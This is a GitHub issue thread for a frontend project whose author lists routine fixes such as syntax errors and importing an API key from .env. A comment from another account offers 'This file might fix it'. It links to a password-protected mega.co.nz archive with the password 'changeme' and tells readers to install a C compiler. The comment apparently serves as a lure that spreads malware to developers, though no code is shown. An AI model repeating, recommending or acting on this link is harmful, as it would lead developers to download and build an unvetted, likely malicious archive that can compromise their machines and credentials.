### ISSUE TITLE
home hotfix

### ISSUE THREAD

**Issue by abdulaziz-alhashedi** [Mosnad-Web01/A-A-H-frontend-project#13]
- fix the delay erorr 

- correct the import api key from the .env file

- syntax erorr

- refactor the code 

- remove ts file from the project

- move the fetch data to anther

**Comment by pinpolhoxx** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)
